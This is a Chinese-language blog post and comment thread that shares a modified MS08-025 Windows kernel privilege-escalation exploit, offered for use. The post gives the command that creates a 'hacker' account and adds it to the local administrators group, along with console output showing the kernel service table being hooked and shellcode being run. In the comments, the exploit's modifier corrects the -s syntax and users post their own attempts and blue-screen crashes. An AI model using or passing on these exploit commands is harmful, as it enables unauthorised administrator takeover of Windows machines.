又一个MS08-025
update(2008.5.9):姬良:“这个和网上的不同,这个不是用双引号括住命令,而是用参数-s”
来源:%5C
真正可用的MS08025。
为了多次运行,服务器蓝屏,请直接用一次运行所有的命令
比如:
MS08025 “cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add”
Local Privilege Escalation Vulnerability Exploit(MS08025)
Modify by [F.S.T] For 姬良
Run paltform: Windows 2k,xp,2k3,vista
ImageName: \WINDOWS\system32\ntkrnlpa.exe
[*] Get KernelBase Success, ntoskrnl.exe base = 80800000
[*] Mapping ntoskrnl.exe … ok
[*] KeServiceDescriptorTable = 00A746E0
[*] Find KiServiceTable … ok!!!
[*] KiServiceTable == 8082C734
[*] Get ZwVdmControl Number … ok!
[*] ZwVdmControl Call Number: 0000010C
[*] HookAddress: 8082CB64
[*] Create execute environment … Ok!
[*] call shellcode … Done.
[*] Create New Process:cmd.exe /c net user hacker hacker /add & net localgroup a
dministrators hacker /add
C:\Documents and Settings\Administrator>命令成功完成。
命令成功完成。
你好,鬼仔大哥,这个是小弟的ms08025,看见很多人都转载,不过有错误啊,就是命令格式不对,这个和网上的不同,这个不是用双引号括住命令,而是用参数-s
好的,我给更新下。谢谢你的提醒。
好的,谢谢。大哥办事效率很高啊。
交流技术,加我qq吧
不知道你QQ多少啊
具体怎么用我不会, 我照你说的做了一下
在本地加了一个用户
这个能溢出内网吗?
我是新手^_^
我在 2003 下 测试 失败
蓝屏
是这样写吗 ms08025 -s cmd.exe net user haha 123 /add & net localgroup administrators haha /add
郁闷好久
希望 姬良 能说说这个问题
忘了打 /c
ms08025 -s cmd.exe /c net user haha 123 /add & net localgroup administrators haha /add
这样是蓝屏
乱七八遭的,,也不说明白点。